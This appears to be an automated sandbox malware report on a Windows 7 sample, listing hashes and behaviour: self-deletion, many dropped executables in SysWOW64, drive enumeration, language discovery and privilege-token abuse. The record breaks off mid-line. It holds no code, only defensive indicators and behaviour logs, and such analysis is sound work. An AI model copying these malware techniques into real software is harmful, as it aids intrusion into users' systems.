Analysis
max time kernel: 150s
max time network: 118s
platform: windows7_x64
resource: win7-20240708-en
resource tags: arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
submitted: 28-09-2024 04:21
Behavioral task: behavioral1
Sample: fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe
Resource: win7-20240708-en
General
Target: fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe
Size: 86KB
MD5: fb7e4180110ac2917b6a1f816438c7b9
SHA1: 392ae561ded6639279ceef98fe800538fc3eda76
SHA256: d7e299c1f844e0714d1e072f371c53929322fab99aa8fc9e73433f12994e1568
SHA512: e3b66b2e4a86fbb3cabe71c96dfa924c55b5d119c6cfcf0929f93bc2135dc401d35cbdc5772e9c6f6aef8a48cd4e0f2a9d311ddd3923c8cae47dcc5874fe453d
SSDEEP: 1536:vKec0Px8LhsjgyFL3raHLASSPh5I+C1ORnD0e/PTPBeXFpNDp:yi8m0yJPD1C1qD0+Jef
Malware Config
Signatures
Deletes itself 1 IoCs
pid    Process
15424  Process not Found
Executes dropped EXE 64 IoCs
pid Process 2388 FVe1JJh.exe 2664 sUUAXgs.exe 2860 sUUAXgs.exe 2936 sUUAXgs.exe 2708 sUUAXgs.exe 2528 sUUAXgs.exe 2572 sUUAXgs.exe 2232 sUUAXgs.exe 2104 sUUAXgs.exe 2748 sUUAXgs.exe 1664 sUUAXgs.exe 1784 sUUAXgs.exe 2068 sUUAXgs.exe 1264 sUUAXgs.exe 1336 sUUAXgs.exe 2876 sUUAXgs.exe 2908 sUUAXgs.exe 2896 sUUAXgs.exe 3056 sUUAXgs.exe 2184 sUUAXgs.exe 1428 sUUAXgs.exe 380 sUUAXgs.exe 2960 sUUAXgs.exe 1696 sUUAXgs.exe 736 sUUAXgs.exe 1076 sUUAXgs.exe 1960 sUUAXgs.exe 2040 sUUAXgs.exe 748 sUUAXgs.exe 1892 sUUAXgs.exe 1544 sUUAXgs.exe 1540 sUUAXgs.exe 108 sUUAXgs.exe 2220 sUUAXgs.exe 2968 sUUAXgs.exe 2228 sUUAXgs.exe 3052 sUUAXgs.exe 2208 sUUAXgs.exe 1252 sUUAXgs.exe 1504 sUUAXgs.exe 1668 sUUAXgs.exe 868 sUUAXgs.exe 2436 sUUAXgs.exe 2468 sUUAXgs.exe 1608 sUUAXgs.exe 1600 sUUAXgs.exe 1520 sUUAXgs.exe 2260 sUUAXgs.exe 2680 sUUAXgs.exe 2796 sUUAXgs.exe 2372 sUUAXgs.exe 2692 sUUAXgs.exe 2824 sUUAXgs.exe 2740 sUUAXgs.exe 2188 sUUAXgs.exe 1032 sUUAXgs.exe 2644 sUUAXgs.exe 2540 sUUAXgs.exe 2608 sUUAXgs.exe 2580 sUUAXgs.exe 2196 sUUAXgs.exe 1532 sUUAXgs.exe 2788 sUUAXgs.exe 1548 sUUAXgs.exe -
Loads dropped DLL 64 IoCs
pid Process 2388 FVe1JJh.exe 2388 FVe1JJh.exe 2664 sUUAXgs.exe 2664 sUUAXgs.exe 2860 sUUAXgs.exe 2860 sUUAXgs.exe 2936 sUUAXgs.exe 2936 sUUAXgs.exe 2708 sUUAXgs.exe 2708 sUUAXgs.exe 2528 sUUAXgs.exe 2528 sUUAXgs.exe 2572 sUUAXgs.exe 2572 sUUAXgs.exe 2232 sUUAXgs.exe 2232 sUUAXgs.exe 2104 sUUAXgs.exe 2104 sUUAXgs.exe 2748 sUUAXgs.exe 2748 sUUAXgs.exe 1664 sUUAXgs.exe 1664 sUUAXgs.exe 1784 sUUAXgs.exe 1784 sUUAXgs.exe 2068 sUUAXgs.exe 2068 sUUAXgs.exe 1264 sUUAXgs.exe 1264 sUUAXgs.exe 1336 sUUAXgs.exe 1336 sUUAXgs.exe 2876 sUUAXgs.exe 2876 sUUAXgs.exe 2908 sUUAXgs.exe 2908 sUUAXgs.exe 2896 sUUAXgs.exe 2896 sUUAXgs.exe 3056 sUUAXgs.exe 3056 sUUAXgs.exe 2184 sUUAXgs.exe 2184 sUUAXgs.exe 1428 sUUAXgs.exe 1428 sUUAXgs.exe 380 sUUAXgs.exe 380 sUUAXgs.exe 2960 sUUAXgs.exe 2960 sUUAXgs.exe 1696 sUUAXgs.exe 1696 sUUAXgs.exe 736 sUUAXgs.exe 736 sUUAXgs.exe 1076 sUUAXgs.exe 1076 sUUAXgs.exe 1960 sUUAXgs.exe 1960 sUUAXgs.exe 2040 sUUAXgs.exe 2040 sUUAXgs.exe 748 sUUAXgs.exe 748 sUUAXgs.exe 1892 sUUAXgs.exe 1892 sUUAXgs.exe 1544 sUUAXgs.exe 1544 sUUAXgs.exe 1540 sUUAXgs.exe 1540 sUUAXgs.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\l: sUUAXgs.exe File opened (read-only) \??\t: sUUAXgs.exe File opened (read-only) \??\m: Process not Found File opened (read-only) \??\i: Process not Found File opened (read-only) \??\o: Process not Found File opened (read-only) \??\w: sUUAXgs.exe File opened (read-only) \??\g: sUUAXgs.exe File opened (read-only) \??\y: sUUAXgs.exe File opened (read-only) \??\z: Process not Found File opened (read-only) \??\o: Process not Found File opened (read-only) \??\v: Process not Found File opened (read-only) \??\q: sUUAXgs.exe File opened (read-only) \??\q: sUUAXgs.exe File opened (read-only) \??\j: sUUAXgs.exe File opened (read-only) \??\i: sUUAXgs.exe File opened (read-only) \??\s: Process not Found File opened (read-only) \??\z: Process not Found File opened (read-only) \??\r: Process not Found File opened (read-only) \??\p: Process not Found File opened (read-only) \??\v: sUUAXgs.exe File opened (read-only) \??\k: sUUAXgs.exe File opened (read-only) \??\e: sUUAXgs.exe File opened (read-only) \??\r: sUUAXgs.exe File opened (read-only) \??\v: Process not Found File opened (read-only) \??\x: Process not Found File opened (read-only) \??\h: Process not Found File opened (read-only) \??\s: Process not Found File opened (read-only) \??\m: Process not Found File opened (read-only) \??\z: Process not Found File opened (read-only) \??\r: Process not Found File opened (read-only) \??\t: sUUAXgs.exe File opened (read-only) \??\n: Process not Found File opened (read-only) \??\i: Process not Found File opened (read-only) \??\r: Process not Found File opened (read-only) \??\o: Process not Found File opened (read-only) \??\g: Process not Found File opened (read-only) \??\x: Process not Found File opened (read-only) \??\n: sUUAXgs.exe File opened (read-only) \??\t: sUUAXgs.exe File opened (read-only) \??\z: Process not Found File opened (read-only) \??\k: Process not Found File opened (read-only) \??\g: Process not Found File opened 
(read-only) \??\z: Process not Found File opened (read-only) \??\v: sUUAXgs.exe File opened (read-only) \??\n: sUUAXgs.exe File opened (read-only) \??\x: sUUAXgs.exe File opened (read-only) \??\t: sUUAXgs.exe File opened (read-only) \??\m: Process not Found File opened (read-only) \??\u: Process not Found File opened (read-only) \??\n: sUUAXgs.exe File opened (read-only) \??\s: Process not Found File opened (read-only) \??\e: Process not Found File opened (read-only) \??\s: Process not Found File opened (read-only) \??\s: Process not Found File opened (read-only) \??\y: Process not Found File opened (read-only) \??\o: sUUAXgs.exe File opened (read-only) \??\s: sUUAXgs.exe File opened (read-only) \??\m: sUUAXgs.exe File opened (read-only) \??\g: sUUAXgs.exe File opened (read-only) \??\p: Process not Found File opened (read-only) \??\r: Process not Found File opened (read-only) \??\j: Process not Found File opened (read-only) \??\e: Process not Found File opened (read-only) \??\v: sUUAXgs.exe -
Drops file in System32 directory 64 IoCs
description ioc Process File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe Process not Found File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe Process not Found File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe sUUAXgs.exe File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe sUUAXgs.exe File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe Process not Found File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe Process not Found File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe sUUAXgs.exe File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe sUUAXgs.exe File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe Process not Found File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe Process not Found File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe Process not Found File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe Process not Found File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe sUUAXgs.exe File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe sUUAXgs.exe File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe sUUAXgs.exe File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe sUUAXgs.exe File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe Process not Found File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe Process not Found File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe sUUAXgs.exe File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe Process not Found File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe sUUAXgs.exe File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe sUUAXgs.exe File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe sUUAXgs.exe File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe sUUAXgs.exe File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe sUUAXgs.exe File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe sUUAXgs.exe File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe sUUAXgs.exe File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe Process not Found File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe sUUAXgs.exe File created 
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe sUUAXgs.exe File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe sUUAXgs.exe File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe sUUAXgs.exe File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe Process not Found File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe Process not Found File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe Process not Found File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe Process not Found File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe sUUAXgs.exe File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe sUUAXgs.exe File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe sUUAXgs.exe File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe Process not Found File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe Process not Found File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe Process not Found File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe Process not Found File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe sUUAXgs.exe File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe Process not Found File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe Process not Found File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe sUUAXgs.exe File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe sUUAXgs.exe File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe sUUAXgs.exe File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe Process not Found File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe Process not Found File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe Process not Found File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe sUUAXgs.exe File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe sUUAXgs.exe File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe sUUAXgs.exe File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe Process not Found File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe Process not Found File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe Process not Found File created 
C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe Process not Found File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe sUUAXgs.exe File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe sUUAXgs.exe File created C:\Windows\SysWOW64\sUUAXgs\v7Fqtqd.exe Process not Found File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe Process not Found File created C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe sUUAXgs.exe -
resource yara_rule behavioral1/files/0x000f000000012782-4.dat upx behavioral1/memory/2388-9-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2388-15-0x0000000000490000-0x00000000004DA000-memory.dmp upx behavioral1/memory/2664-21-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2388-28-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2664-35-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2528-38-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2860-41-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2708-52-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2232-53-0x0000000000490000-0x00000000004DA000-memory.dmp upx behavioral1/memory/2936-46-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2748-62-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2572-64-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2528-58-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2572-66-0x0000000000260000-0x00000000002AA000-memory.dmp upx behavioral1/memory/1664-69-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2232-71-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2068-81-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2104-79-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/1264-87-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2748-85-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/1664-90-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/1784-94-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2068-99-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2876-98-0x0000000000400000-0x000000000044A000-memory.dmp upx 
behavioral1/memory/1264-103-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/3056-110-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/1336-109-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2876-113-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/1428-121-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/3056-126-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2896-123-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2908-118-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2960-128-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2184-129-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/1428-132-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/736-134-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/380-133-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2960-136-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/1960-137-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/1696-138-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/736-142-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/748-144-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/1076-145-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/1960-146-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2040-148-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/748-150-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/1892-152-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/1544-154-0x0000000000400000-0x000000000044A000-memory.dmp upx 
behavioral1/memory/1540-156-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2228-159-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/108-160-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/3052-162-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2220-163-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2228-169-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/1252-167-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2968-165-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/3052-170-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/1668-171-0x0000000000400000-0x000000000044A000-memory.dmp upx behavioral1/memory/2208-172-0x0000000000400000-0x000000000044A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found 
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened 
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sUUAXgs.exe -
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Zoom IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\IETld\LowMic IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\PageSetup IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive IEXPLORE.EXE Key 
created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\GPU IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{1B330C41-7D51-11EF-B33F-CE9644F3BBBD} = "0" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\IntelliForms IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\InternetRegistry IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Toolbar IEXPLORE.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid  Process
524  fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 524 fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe Token: SeLoadDriverPrivilege 2388 FVe1JJh.exe Token: SeLoadDriverPrivilege 2664 sUUAXgs.exe Token: SeLoadDriverPrivilege 2860 sUUAXgs.exe Token: SeLoadDriverPrivilege 2936 sUUAXgs.exe Token: SeLoadDriverPrivilege 2708 sUUAXgs.exe Token: SeLoadDriverPrivilege 2528 sUUAXgs.exe Token: SeLoadDriverPrivilege 2572 sUUAXgs.exe Token: SeLoadDriverPrivilege 2232 sUUAXgs.exe Token: SeLoadDriverPrivilege 2104 sUUAXgs.exe Token: SeLoadDriverPrivilege 2748 sUUAXgs.exe Token: SeLoadDriverPrivilege 1664 sUUAXgs.exe Token: SeLoadDriverPrivilege 1784 sUUAXgs.exe Token: SeLoadDriverPrivilege 2068 sUUAXgs.exe Token: SeLoadDriverPrivilege 1264 sUUAXgs.exe Token: SeLoadDriverPrivilege 1336 sUUAXgs.exe Token: SeLoadDriverPrivilege 2876 sUUAXgs.exe Token: SeLoadDriverPrivilege 2908 sUUAXgs.exe Token: SeLoadDriverPrivilege 2896 sUUAXgs.exe Token: SeLoadDriverPrivilege 3056 sUUAXgs.exe Token: SeLoadDriverPrivilege 2184 sUUAXgs.exe Token: SeLoadDriverPrivilege 1428 sUUAXgs.exe Token: SeLoadDriverPrivilege 380 sUUAXgs.exe Token: SeLoadDriverPrivilege 2960 sUUAXgs.exe Token: SeLoadDriverPrivilege 1696 sUUAXgs.exe Token: SeLoadDriverPrivilege 736 sUUAXgs.exe Token: SeLoadDriverPrivilege 1076 sUUAXgs.exe Token: 